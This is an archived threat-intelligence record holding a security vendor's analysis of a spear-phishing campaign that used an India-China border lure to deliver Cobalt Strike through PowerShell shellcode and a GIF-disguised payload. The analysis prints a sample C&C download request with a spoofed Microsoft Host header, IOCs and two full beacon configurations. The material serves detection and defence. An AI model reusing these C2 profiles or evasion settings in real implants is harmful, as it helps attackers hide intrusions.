{
	"id": "b13879c7-8a34-4da7-a93a-37bf446dc25c",
	"created_at": "2026-04-06T00:17:27.844704Z",
	"updated_at": "2026-04-10T03:38:09.861857Z",
	"deleted_at": null,
	"sha1_hash": "2be31dcf1ff921f838b40e106486ec12bb0bc3ff",
	"title": "Targeted Attack Leverages India-China Border Dispute",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1025978,
	"plain_text": "Targeted Attack Leverages India-China Border Dispute\r\nBy Atinderpal Singh, Nirmal Singh, Sahil Antil\r\nPublished: 2020-06-19 · Archived: 2026-04-05 14:06:15 UTC\r\nMalicious threat actors are always ready to take advantage of current affairs to maximize the success rate of their attacks.\r\nThe Zscaler ThreatLabZ team recently came across one such attack trying to leverage the current India-China border dispute\r\nto lure victims into opening an attached malicious document.\r\nKey points\r\nThe attack is fileless as no payload is written on disk and no persistence is created. \r\nThe shellcode uses a fake HTTP host field while communicating with the command and control (C\u0026C) server to\r\ndownload the shellcode.\r\nIt uses the DKMC framework to hide communication in plain sight using steganography.\r\nIt relies on the Cobalt Strike beacon using a malleable C\u0026C profile.\r\nInfection\r\nIt appears as if victims were sent a malicious lure document as an email attachment. The document is named “India-China\r\nborder tensions.doc” and contains an article by The Times of India about the same topic. \r\nFigure 1: The infection flow of this attack.\r\nDocument\r\nThe document contains one line that reads “Geostrategic article for SE Asia Security Analyst,” indicating that the target\r\nmight be a security analyst for southeast Asia.\r\nFigure 2: The malicious document containing a new article reference. \r\nInterestingly, the document contained corrupted macro code, leading us to believe that it was built in a hurry using some\r\nautomated macro obfuscation tool without proper testing.\r\nThough the macro is corrupt, we were able to extract the PowerShell command using static analysis. The code obfuscation is\r\nvery basic. It simply subtracts the value 4 to decrypt the PowerShell command. 
\r\nhttps://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims\r\nPage 1 of 8\n\nFigure 3: The macro command decryption function.\r\nPart of the PowerShell command after the base64 decoding looks like this:\r\nFigure 4: Part of the PowerShell code designed to run shellcode.\r\nAlmost exact code from the DKMC framework is used to run embedded base64 encoded shellcode. The PowerShell script is\r\ndesigned to run the shellcode in 32-bit mode only. It checks whether the script is running in a 64-bit PowerShell\r\nprocess by checking the int pointer size, which will be 8 bytes [64 bits] in a 64-bit process. If that is the case, then it\r\ntries to run PowerShell in 32-bit mode with the shellcode injection script code as an argument.\r\nInjected shellcode \r\nOn execution, this shellcode downloads another shellcode, but with a valid GIF header, again borrowing a technique from\r\nDKMC. Interestingly, this shellcode uses a fake HTTP Host header and a predefined User-Agent field, in this case, to\r\ndownload a GIF payload from the C\u0026C IP over HTTPS.\r\nFigure 5: The shellcode starting with well-known module list access instructions.\r\nC\u0026C IP: 47.240.73.77\r\nRequest example:\r\nGET /avatar_32px.jpg HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHost: update.windows.microsoft.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nDownloaded payload\r\nThis GIF file, just after the GIF magic bytes [“GIF89a” in this case, which is also a valid assembly instruction], contains a\r\nshellcode followed by an XOR-encrypted payload. The shellcode decrypts and executes this payload, which turns out to be a\r\nCobalt Strike beacon. 
\r\nFigure 6: The shellcode and payload before decryption.\r\nFigure 7: The shellcode and payload after decryption.\r\nThe beacon is configured to point to the following C\u0026C address “userimage8.360doc.com,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books”  and the same host field and user agent.\r\nIn another instance, we found a .NET payload, which injects an RSA-encrypted payload into a notepad.exe file after\r\ndecryption with the MD5: 9c2ee383d235a702c5ad70b1444efb4d.\r\nIn this case, the beacon payload is downloaded from https://114.67.110[.]37/QBah. The shellcode and additional payload are\r\nsimilar except for the C\u0026C addresses. Noticeably, both beacon DLLs use a 360doc.com-based C\u0026C, and the watermark is\r\nexactly the same in both: 305419896.\r\nAs Cobalt Strike is a well-known commercial tool for red teams, we are not getting into its technical details.\r\nAttribution\r\nAs of now, we are not able to attribute this attack to a specific actor with enough confidence. But here are a few\r\nobservations. The group OceanLotus is known to use DKMC, Cobalt Strike, and fileless payloads. But the use of a proper\r\nGIF header for shellcode seems to be new for them. On the other hand, the watermark value (305419896) found in the\r\nbeacon configuration has also been used by the Trickbot Group. \r\nZscaler Cloud Sandbox report\r\nFigure 8: The Zscaler Cloud Sandbox report for this malware.\r\nNote: The document will crash in this case, but if fixed to run, the Zscaler Cloud Sandbox will block its activity.\r\nIn addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels. Check\r\nout our Threat Library for more details about Win32.Backdoor.CobaltStrike.\r\nConclusion\r\nThreat actors always try to find ways to blend into real traffic. In this case, 
they are using an SSL/TLS connection and a host\r\nheader set to a legitimate Microsoft website. One such evasion trick that we covered in our earlier blog was the use of a\r\nFakeTLS header.\r\nThe Zscaler ThreatLabZ team is continuously monitoring threat actors and ensuring protection against such threats. \r\nAcknowledgment\r\nThanks to Adtiya Sharma for providing support in the research.\r\nMITRE ATT\u0026CK TTP Mapping\r\nID | Technique | Description\r\nT1193 | Spearphishing Attachment | Document is delivered as an email attachment\r\nT1086 | PowerShell | Uses PowerShell to run shellcode\r\nT1204 | User Execution | Uses doc attachment requiring user interaction\r\nT1140 | Deobfuscate/Decode Files or Information | Decrypt payloads during execution\r\nT1027 | Obfuscated Files or Information | Uses encrypted payloads\r\nT1036 | Masquerading | Uses fake GIF header magic bytes and filename\r\nT1043 | Commonly Used Port | 443\r\nT1008 | Fallback Channels | Uses more than one C\u0026C\r\nT1071 | Standard Application Layer Protocol | Uses HTTPS\r\nNote: The TTP list above contains only the TTPs observed during the campaign, as a Cobalt Strike beacon has many more features. 
A\r\ncomplete list of techniques can be found here.\r\nIOCs\r\nNetwork IOCs\r\n47.240.73[.]77\r\n114.67.110[.]37\r\nuserimage8.360doc[.]com\r\nimage91.360doc[.]com\r\nwelcome.toutiao[.]com\r\nAppendix\r\nBeacon Config [9632bec3bf5caa71d091f08d6701d5d8]:\r\n{\r\n    \"BeaconType\": [\r\n        \"HTTPS\"\r\n    ],\r\n    \"Port\": 443,\r\n    \"SleepTime\": 2000,\r\n    \"MaxGetSize\": 1048576,\r\n    \"Jitter\": 30,\r\n    \"MaxDNS\": 255,\r\n    \"PublicKey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqkaeSkv+M5R/uTJPUwinLLSQ2X8C/vPURmKkkDXjabFDduIL3hsJ16AWuCdTswnKts0\r\n    \"C2Server\": \"userimage8.360doc.com,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books\",\r\n    \"UserAgent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\r\n    \"HttpPostUri\": \"/N4215/adj/aliyun.cn.sr.aps\",\r\n    \"HttpGet_Metadata\": [\r\n        \"Accept: */*\",\r\n        \"Host: update.windows.microsoft.com\",\r\n        \"session-token=\",\r\n        \"skin=noskin;\",\r\n        \"csm-hit=s-24KU11BB82RZSYGJ3BDK|1585758520\",\r\n        \"Cookie\"\r\n    ],\r\n    \"HttpPost_Metadata\": [\r\n        \"Accept: */*\",\r\n        \"Content-Type: text/xml\",\r\n        \"X-Requested-With: XMLHttpRequest\",\r\n        \"Host: weathers.bing.com\",\r\n        \"sz=160x600\",\r\n        \"oe=oe=ISO-8859-1;\",\r\n        \"sn\"\r\n    ],\r\n    \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n    \"PipeName\": \"\",\r\n    \"DNS_Idle\": \"0.0.0.0\",\r\n    \"DNS_Sleep\": 0,\r\n    \"SSH_Host\": \"Not Found\",\r\n    \"SSH_Port\": \"Not 
Found\",\r\n    \"SSH_Username\": \"Not Found\",\r\n    \"SSH_Password_Plaintext\": \"Not Found\",\r\n    \"SSH_Password_Pubkey\": \"Not Found\",\r\n    \"HttpGet_Verb\": \"GET\",\r\n    \"HttpPost_Verb\": \"POST\",\r\n    \"HttpPostChunk\": 0,\r\n    \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n    \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n    \"CryptoScheme\": 0,\r\n    \"Proxy_Config\": \"Not Found\",\r\n    \"Proxy_User\": \"Not Found\",\r\n    \"Proxy_Password\": \"Not Found\",\r\n    \"Proxy_Behavior\": \"Use IE settings\",\r\n    \"Watermark\": 305419896,\r\n    \"bStageCleanup\": \"False\",\r\n    \"bCFGCaution\": \"False\",\r\n    \"KillDate\": 0,\r\n    \"bProcInject_StartRWX\": \"True\",\r\n    \"bProcInject_UseRWX\": \"True\",\r\n    \"bProcInject_MinAllocSize\": 0,\r\n    \"ProcInject_PrependAppend_x86\": \"Empty\",\r\n    \"ProcInject_PrependAppend_x64\": \"Empty\",\r\n    \"ProcInject_Execute\": [\r\n        \"CreateThread\",\r\n        \"SetThreadContext\",\r\n        \"CreateRemoteThread\",\r\n        \"RtlCreateUserThread\"\r\n    ],\r\n    \"ProcInject_AllocationMethod\": \"VirtualAllocEx\",\r\n    \"bUsesCookies\": \"True\",\r\n    \"HostHeader\": \"Host: update.windows.microsoft.com\\r\\n\"\r\n}\r\nBeacon Config[a7662d43bb06f31d2152c4f0af039b6e]:\r\n{\r\n    \"BeaconType\": [\r\n        \"HTTPS\"\r\n    ],\r\n    \"Port\": 443,\r\n    \"SleepTime\": 5000,\r\n    \"MaxGetSize\": 2097607,\r\n    \"Jitter\": 30,\r\n    \"MaxDNS\": 255,\r\n    \"PublicKey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDDjGBTLCLwB7GPYyUi4sZYnhkQVCfDL4WwPx+YV4YziSbxIzrKAVpZTaiD8srY15L\r\n    \"C2Server\": \"welcome.toutiao.com,/s,image91.360doc.com,/s\",\r\n    \"UserAgent\": \"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\",\r\n    \"HttpPostUri\": \"/S\",\r\n    \"HttpGet_Metadata\": [\r\n        
\"Host: image.tencent.com\",\r\n        \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n        \"Cookie: BAIDUID=NSAB29B2991BAA:FG=2\",\r\n        \"wd\",\r\n        \"ie=utf-8\"\r\n    ],\r\n    \"HttpPost_Metadata\": [\r\n        \"Host: image.tencent.com\",\r\n        \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n        \"Cookie: BAIDUID=NSAB29B2991BAA:FG=2\",\r\n        \"wd\",\r\n        \"ie\"\r\n    ],\r\n    \"SpawnTo\": \"nM+xbKt6yXlj++MYE0T3iQ==\",\r\n    \"PipeName\": \"\",\r\n    \"DNS_Idle\": \"0.0.0.0\",\r\n    \"DNS_Sleep\": 0,\r\n    \"SSH_Host\": \"Not Found\",\r\n    \"SSH_Port\": \"Not Found\",\r\n    \"SSH_Username\": \"Not Found\",\r\n    \"SSH_Password_Plaintext\": \"Not Found\",\r\n    \"SSH_Password_Pubkey\": \"Not Found\",\r\n    \"HttpGet_Verb\": \"GET\",\r\n    \"HttpPost_Verb\": \"POST\",\r\n    \"HttpPostChunk\": 96,\r\n    \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n    \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n    \"CryptoScheme\": 0,\r\n    \"Proxy_Config\": \"Not Found\",\r\n    \"Proxy_User\": \"Not Found\",\r\n    \"Proxy_Password\": \"Not Found\",\r\n    \"Proxy_Behavior\": \"Use IE settings\",\r\n    \"Watermark\": 305419896,\r\n    \"bStageCleanup\": \"False\",\r\n    \"bCFGCaution\": \"False\",\r\n    \"KillDate\": 0,\r\n    \"bProcInject_StartRWX\": \"True\",\r\n    \"bProcInject_UseRWX\": \"True\",\r\n    \"bProcInject_MinAllocSize\": 0,\r\n    \"ProcInject_PrependAppend_x86\": \"Empty\",\r\n    \"ProcInject_PrependAppend_x64\": \"Empty\",\r\n    \"ProcInject_Execute\": [\r\n        \"CreateThread\",\r\n        \"SetThreadContext\",\r\n        \"CreateRemoteThread\",\r\n        \"RtlCreateUserThread\"\r\n    ],\r\n    \"ProcInject_AllocationMethod\": \"VirtualAllocEx\",\r\n    \"bUsesCookies\": 
\"True\",\r\n    \"HostHeader\": \"\"\r\n}\r\nSource: https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims"
	],
	"report_names": [
		"targeted-attack-leverages-india-china-border-dispute-lure-victims"
	],
	"threat_actors": [
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb",
			"created_at": "2023-01-06T13:46:38.228042Z",
			"updated_at": "2026-04-10T02:00:02.883048Z",
			"deleted_at": null,
			"main_name": "APT1",
			"aliases": [
				"PLA Unit 61398",
				"Comment Crew",
				"Byzantine Candor",
				"Comment Group",
				"GIF89a",
				"Group 3",
				"TG-8223",
				"Brown Fox",
				"ShadyRAT",
				"G0006",
				"COMMENT PANDA"
			],
			"source_name": "MISPGALAXY:APT1",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32 ",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN "
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2439ad53-39cc-4fff-8fdf-4028d65803c0",
			"created_at": "2022-10-25T16:07:23.353204Z",
			"updated_at": "2026-04-10T02:00:04.55407Z",
			"deleted_at": null,
			"main_name": "APT 32",
			"aliases": [
				"APT 32",
				"APT-C-00",
				"APT-LY-100",
				"ATK 17",
				"G0050",
				"Lotus Bane",
				"Ocean Buffalo",
				"OceanLotus",
				"Operation Cobalt Kitty",
				"Operation PhantomLance",
				"Pond Loach",
				"SeaLotus",
				"SectorF01",
				"Tin Woodlawn"
			],
			"source_name": "ETDA:APT 32",
			"tools": [
				"Agentemis",
				"Android.Backdoor.736.origin",
				"AtNow",
				"Backdoor.MacOS.OCEANLOTUS.F",
				"BadCake",
				"CACTUSTORCH",
				"CamCapture Plugin",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"Cuegoe",
				"DKMC",
				"Denis",
				"Goopy",
				"HiddenLotus",
				"KOMPROGO",
				"KerrDown",
				"METALJACK",
				"MSFvenom",
				"Mimikatz",
				"Nishang",
				"OSX_OCEANLOTUS.D",
				"OceanLotus",
				"PHOREAL",
				"PWNDROID1",
				"PhantomLance",
				"PowerSploit",
				"Quasar RAT",
				"QuasarRAT",
				"RatSnif",
				"Remy",
				"Remy RAT",
				"Rizzo",
				"Roland",
				"Roland RAT",
				"SOUNDBITE",
				"Salgorea",
				"Splinter RAT",
				"Terracotta VPN",
				"Yggdrasil",
				"cobeacon",
				"denesRAT",
				"fingerprintjs2"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b",
			"created_at": "2022-10-25T16:07:23.480196Z",
			"updated_at": "2026-04-10T02:00:04.626125Z",
			"deleted_at": null,
			"main_name": "Comment Crew",
			"aliases": [
				"APT 1",
				"BrownFox",
				"Byzantine Candor",
				"Byzantine Hades",
				"Comment Crew",
				"Comment Panda",
				"G0006",
				"GIF89a",
				"Group 3",
				"Operation Oceansalt",
				"Operation Seasalt",
				"Operation Siesta",
				"Shanghai Group",
				"TG-8223"
			],
			"source_name": "ETDA:Comment Crew",
			"tools": [
				"Auriga",
				"Cachedump",
				"Chymine",
				"CookieBag",
				"Darkmoon",
				"GDOCUPLOAD",
				"GLOOXMAIL",
				"GREENCAT",
				"Gen:Trojan.Heur.PT",
				"GetMail",
				"Hackfase",
				"Hacksfase",
				"Helauto",
				"Kurton",
				"LETSGO",
				"LIGHTBOLT",
				"LIGHTDART",
				"LOLBAS",
				"LOLBins",
				"LONGRUN",
				"Living off the Land",
				"Lslsass",
				"MAPIget",
				"ManItsMe",
				"Mimikatz",
				"MiniASP",
				"Oceansalt",
				"Pass-The-Hash Toolkit",
				"Poison Ivy",
				"ProcDump",
				"Riodrv",
				"SPIVY",
				"Seasalt",
				"ShadyRAT",
				"StarsyPound",
				"TROJAN.COOKIES",
				"TROJAN.FOXY",
				"TabMsgSQL",
				"Tarsip",
				"Trojan.GTALK",
				"WebC2",
				"WebC2-AdSpace",
				"WebC2-Ausov",
				"WebC2-Bolid",
				"WebC2-Cson",
				"WebC2-DIV",
				"WebC2-GreenCat",
				"WebC2-Head",
				"WebC2-Kt3",
				"WebC2-Qbp",
				"WebC2-Rave",
				"WebC2-Table",
				"WebC2-UGX",
				"WebC2-Yahoo",
				"Wordpress Bruteforcer",
				"bangat",
				"gsecdump",
				"pivy",
				"poisonivy",
				"pwdump",
				"zxdosml"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434647,
	"ts_updated_at": 1775792289,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2be31dcf1ff921f838b40e106486ec12bb0bc3ff.pdf",
		"text": "https://archive.orkl.eu/2be31dcf1ff921f838b40e106486ec12bb0bc3ff.txt",
		"img": "https://archive.orkl.eu/2be31dcf1ff921f838b40e106486ec12bb0bc3ff.jpg"
	}
}